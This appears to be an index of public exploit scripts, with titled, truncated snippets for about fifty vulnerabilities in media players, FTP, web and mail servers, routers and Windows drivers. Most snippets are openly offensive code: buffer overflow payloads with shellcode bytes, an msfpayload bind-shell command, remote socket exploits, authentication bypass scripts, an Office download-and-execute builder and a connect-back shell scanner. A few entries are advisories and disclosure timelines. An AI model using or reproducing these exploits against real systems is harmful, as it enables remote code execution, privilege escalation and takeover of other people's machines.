Gold-MP4-Player-3.3

Exploit Title: GoldMP4Player Buffer Overflow SEH Software Link: http://download.cnet.com/GoldMP4Player/3000-21394-10967424.html Version: 3.3 Date: 27.02.2014 head="http://" buff="\x41" 253 shell calc.exe buff+="ëÿÿœ¼‰áÛÖÙqôZJJJJJJJJJJJCCCCCC7RYjAXP0A0AkAAQ2AB2BB0BBABXP8"...

VCDGear-3.50---(.cue)

Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will...

KMPlayer-3.8.0.117

KMPlayer 3.8.0.117 Buffer Overflow Author: metacom Tested on: Windows Xp pro-sp3 En Download link :http://www.chip.de/downloads/KMPlayer33859258.html Version: 3.8.0.117 Kmp Plus import struct def littleendianaddress: return struct.pack"L",address junk = "\x41" 250 eip = littleendian0x7C86467B...

MP3Info-0.8.5a---SEH

The process memory region starts with a null byte but exploitation is still possible because of the little endian architecture provided that the return address gets placed at the end of the buffer, this however confines us in the tiny 4-byte area after pop/pop/retn Using a couple of trampolines I...

AudioCoder-0.8.29

Exploit Title: AudioCoder-0.8.29 Memory Corruption to Code executionSEH Author: sajith version: AudioCoder-0.8.29 vulnerable app link: http://www.mediacoderhq.com import struct rawinput"Letz start fuzzing" print "POC by sajith shetty" try: f = open"victim.m3u","w" header = "http://" buffer = 5000...

Windows-XP-SP3---BthPan.sys

Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-002 Publication Date: 2014-07-18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt from ctypes import from struct import pack from os import getpid,system from sys...

Symantec-Endpoint-Protection-11.x,-12.x

Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow http://www.offensive-security.com Tested on Windows 7 http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/ Authors: Matteo ryujin Memelli Alexandru sickness Uifalvi offensive-security.com from ctypes import fro...

BlazeDVD-Pro-7.0---(.plf)

BlazeDVD Pro v7.0 - .plf Stack Based Buffer Overflow direct RET - ALSR/DEP bypass on Win8.1 Pro Date: Mon, Aug 11 2014 12:58:06 GMT Exploit Author: Giovanni Bartolomucci Vendor Homepage: http://www.blazevideo.com/ Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe Version:...

Savant-Web-Server-3.1

import socket targetaddress="10.10.10.129" targetport=80 buffer2 = "R0cX" + "R0cX" msfpayload windows/shellbindtcp LPORT=4444 R | msfencode -e x86/shikataganai -c 4 -t c buffer2 += "\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"...

Adobe-Flash-Player-SequenceParameterSetNALUnit

Abysssec Public Exploit CVE-2011-2140 This exploit tested on Adobe Flash Player 10.3.181.34 XP sp3 contact : info at abysssec.com...

Sysax-File-Rename-BoF

Tested on: XP SP3 32bit and Server 2003 SP2 32bitNo DEP Software Versions Tested: 5.50 and 5.52 Date Discovered: Febrary 1, 2012 Vendor Contacted: Febrary 3, 2012 Vendor Response: none import socket,sys,time,re,base64 if lensys.argv != 6: print "+ Usage: ./filename " sys.exit1 target = sys.argv1...

NetDecision-Traffic-4.5.1

Title : Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability Author : Prabhu S Angadi SecPod Technologies www.secpod.com Vendor : http://www.netmechanica.com Advisory : http://secpod.org/blog/?p=481...

NetDecision-Dashboard-1.0

Author : Prabhu S Angadi SecPod Technologies www.secpod.com Vendor : http://www.netmechanica.com Advisory : http://secpod.org/blog/?p=478 http://secpod.org/advisories/SecPodNetmechanicaNetDecisionDashboardServerInfoDiscVuln.txt...

MailMax-4.6-POP3-

MailMax v4.6 POP3 "USER" Remote Buffer Overflow Exploit No Login Needed Newer version's not tested, maybe vulnerable too A hard one this, the shellcode MUST be lowercase. Plus there are many opcode's that break the payload and opcodes that gets changed, like "\xc3" gets converted to "\xe3", and...

sysax--5.57-Directory-Traversal

Title: Sysax Multi Server 5.57 Directory Traversal Tool Post Auth Tested on: XP SP3 32bit and Server 2003 SP2 32bit Date Discovered: March 27, 2012 Vendor Contacted: March 29, 2012 Vendor Response: April 3, 2012 Vendor Fixed: Currently working on fix, check my site for update import...

Solarwinds-Storage-Manager-5.1.0

Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit Date: May 2nd 2012 Author: muts Version: SolarWinds Storage Manager 5.1.0 Tested on: Windows 2003 Archive Url : http://www.offensive-security.com/0day/solarshell.txt import urllib, urllib2, cookielib import sys...

HP-VSA-Remote-Execution

HP VSA / SANiQ Hydra client Nicolas Grégoire [email protected] v0.5 HOST = '192.168.201.11' The remote host PORT = 13838 The hydra port import getopt import re import sys import binascii import struct import socket import os ''' ================================== Define functions...

MySQL-Remote-Root-Authentication-Bypass

This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little. Title: MySQL Remote Root Authentication Bypass Written by: Dave Kennedy ReL1K http://www.secmaniac.com import subprocess ipaddr = rawinput"Enter the IP address of the mysql server: " while 1:...

F5-BIG-IP-Remote-Root

Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w" filewrite.write"""-----BEGIN RSA PRIVATE KEY-----...

XM-Easy-Personal-FTP-Server

Because this address is relative and has a static base in this environment, I was able to use the heap chunk address as the pointer to write at the vtable. Then a function is called at offset 0xb0 or 0x98 and we can reliably return into a ROP payload and execute arbitrary code. import socket impo...

ALLMediaServer-0.8-SEH

Exploit Title: seh exploit, BOF Date: 04/07/2012 Exploit Author: motaz reda Software Link: http://allmediaserver.org/ Version: ALLMediaServer 0.8 Tested On: Windows 7 ultimate...

Atmail-Email-Server-6.4

By sending an email to a user with the Atmail administrative interface open, we can call a remote JavaScript file that will initiate the installation of a specially crafted plugin file via CSRF, enabling remote code execution on the Atmail server. import smtplib, urllib2, sys def sendMaildstemail...

Symantec-Web-Gateway-5.0.3.18

06 Jun 2012: Vulnerability reported to CERT 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012 26 Jun 2012: Email received from Symantec for additional information 26 Jun 2012: Additional proofs of concept sent to Symantec 06 Jul 2012: Update received from Symantec...

Sitecom-MD-25x

Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version: 2.4.17 and below...

QNX--6.5.0-QCONN-1.4.207944

Title : QNX QCONN Remote Command Execution Vurnerability Version : QNX 6.5.0 QCONN 1.4.207944 Download: http://www.qnx.com/download/feature.html?programid=23665 QNX Neutrino 6.5.0 SP1 Vendor : http://www.qnx.com import telnetlib import sys if lensys.argv " print " + Ex QCONNRC.py 192.168.0.1 8000...

ManageEngine-5.5

The SQL injection is possible on the "Advanced Search", the input is not validated correctly. To make it even worse, the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user, which makes a remote shell with root/SYSTEM privileges...

Freefloat-FTP-Server-PUT

In my disclosure to FreeFloat, I reported my discovery and notified them that other exploits for various FTP commands supported by the FreeFloat FTP existed on the internet just to be assured they knew as SecPod reported their findings last year. They responded and acknowledged my discovered...

BigAnt-Server-2.52-SP5-SEH

Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian - expsrv.dll 6.0.9589 Info: Vulnerability...

Novell-File-Reporter

Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability 0day CVE-2012-4959 @abysssec well just one more of our 0day got published after 2 year here is info : https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959 and here...

Ubiquiti-AirOS-5.5.2

The http://IP/test.cgi "essid" parameter is not sanitized for input which allows for execution of operating system commands. The parameter input field can be like this to create a file /tmp/test.txt: LINKTEST /bin/touch /tmp/test.txt " import urllib, urllib2, cookielib, sys, random, mimetools,...

Nagios-history.cgi-Exec-Code

CVE-2012-6096 - Nagios history.cgi Remote Command Execution Another year, another reincarnation of classic and trivial bugs to exploit. This time we attack Nagios.. or more specifically, one of its CGI scripts. !/usr/bin/python CVE-2012-6096 - Nagios history.cgi Remote Command Execution...

Microsoft-Office-2010-Exec-Code

Exploit Title: MS Office 2010 Download Execute Google Dork: NA Date: 19 Feb 2013 Exploit Author: g11tch Vendor Homepage: Software Link: Version: ALL import binascii import sys import time print "Microsoft Office 2010, download -N- execute " print " What do you want to name your .doc ? " print "...

SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows

SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows ActiveX Buffer Overflow in SkinCrafter3vs2005 Affected version=3.8.1.0 Vendor Homepage:http://skincrafter.com/ Software Link:skincrafter.com/downloads/SkinCrafterDemo20052008x86.zip The vulnerability lies in the COM component used by...

BigAnt-Server-2.97---DDNF

Title: BigAnt Server 2.97 DDNF Username Buffer Overflow Author: Craig Freyman @cd1zz http://pwnag3.com Tested on: Windows 7 64 bit DEP/ASLR Bypass...

MinaliC-Webserver-2.0.0

Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 import socket import struct 74 bytes calc.exe from...

Windows-Light-HTTPD-0.1

Buffer overflow in Light HTTPd lhttpd 0.1 allows remote attackers to execute arbitrary code via a long HTTP GET request. import urllib2 from time import sleep def targURL: while True: URL = rawinput"\n Please enter the URL of the Light HTTP server you would like to PWN. Ex. http://192.168.1.1\n\n...

Bifrost-1.2.1-Remote-Buffer-OverFlow

Bifrost contains an overflow condition that is triggered as user-supplied input is not properly validated when handling specially crafted commands. This may allow a remote attacker to cause a buffer overflow, allowing the execution of arbitrary code. import socket from time import sleep from...

ASUS-RT-AC66U-acsd-Param

TitleASUS RT-AC66U Remote Root Shell Exploit - acsd param command Discovered and ReportedJune 2013 Discovered/Exploited ByJacob Holcomb/Gimppy and Jacob Thompson Security Analsyts @ Independent Security Evaluators Software Vendorhttp://asus.com Exploit/Advisoryhttp://securityevaluators.com,...

OpenCompact-Ftp-Server-1.2

Abusing authentication bypass in combination with a directory traversal to grab the sam file for offline cracking By Wireghoul - http://www.justanotherhacker.com Based on Serge Gorbunov's auth bypass http://www.exploit-db.com/exploits/13932/ Software Link: http://sourceforge.net/projects/open-ftp...

HP-Data-Protector-A.06.20

This script allows to execute a command with an arbitrary number of arguments. The trick calls 'perl.exe' interpreter installed with HP Data Protector inside the directory installpath/bin/. The main goal of the script is to bypass the limitation of executing only a single command without any...

Sami-FTP-Server-2.0.1---MKD

Exploit Title: Sami FTP MKD buffer overflow SEH + Bypass ASL Date: 11 Agosto 2013 Exploit Author: Christian Polunchis Ramirez https://intrusionlabs.org Vendor Homepage: http://www.karjasoft.com/old.php Version: Sami FTP Server 2.0.1 Tested on: Windows 7 Home Basic x86, Spanish import socket, sys,...

FiberHome-Modem-Router-HG-110

Exploit Title: Directory Path Traversal FiberHome Modem Router HG-110 / Remote Change DNS Servers Date: 22/09/2013 Exploit Author: Javier Perez - [email protected] - @thes41nt Vendor Homepage: http://hk.fiberhomegroup.com/ Version: HG110BHV1.6 import urllib import urllib2 ip = rawinput "Ent...

Apache-+-PHP-5.x

quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE : - for connect back shell start netcat/nc and bind port on given host:port - is ip-range scanner not is multithreaded, but iz multithreaded iz in random scanner and is scanner from file greets to MustLive - no ssl support - more php paths can be...

Ability-Mail-Server-2013

Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.Exploit Title: Ability Mail Server 2013 Stored XSS Date: 12/20/2013 Exploit Author: David Um Vendor Homepage: http://www.code-crafters.com/ Software...

haneWIN-DNS-Server-1.5.3

Description: A SEH overflow occurs when large amount of data is sent to the server Author: Dario Estrada dash https://intrusionlabs.org Date: 2014-01-29 Version: haneWIN DNS Server 1.5.3 Vendor Homepage: http://www.hanewin.net/ Vulnerable app link:http://www.hanewin.net/dns-e.htm import socket,...

PCMAN-FTP-2.07-CWD

Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow Date: Jan 25,2014 Exploit Author: Mahmod Mahajna Mahy Version: 2.07 Tested on: Windows 7 sp1 x64 english Email: [email protected] import socket as s from sys import argv iflenargv != 4: print "USAGE: %s host " % argv0 exit1 else: store...

PCMAN-FTP-2.07-ABOR

Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow Date: Jan 25,2014 Exploit Author: Mahmod Mahajna Mahy Version: 2.07 Tested on: Windows 7 sp1 x64 english Email: [email protected] import socket as s from sys import argv iflenargv != 4: print "USAGE: %s host " % argv0 exit1 else: store...

HP-Data-Protector-EXEC_BAR

The omniinet service, which runs by default on port 5555, is susceptible to numerous remotely exploitable vulnerabilities. By sending a malicious EXECBAR packet opcode 11, a remote attacker can force the omniinet service to run an arbitrary command. On Windows, the omniinet service is running as...

Ultra-Mini-HTTPD-1.21---POST

Exploit Title: Ultra Mini HTTPD stack buffer overflow POST request Date: 16 Feb 2014 Exploit Author: Sumit Vendor Homepage: http://www.picolix.jp/ Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Version: 1.21 Tested on: Windows XP Professional SP3 A buffer overflow is triggere...

EudoraQualcomm-WorldMail-9.0.333.0

PRE AUTHENTICATION Eudora Qualcomm WorldMail 9.0.333.0 IMAPd Service Preauthentication Buffer Overflow. - Tested on: Windows Server 2003 SP1. - SEH gets overwritten at 749 bytes when using UID command. Only 79 bytes left after SEH, So the shellcode was placed before SEH and backward jump is used...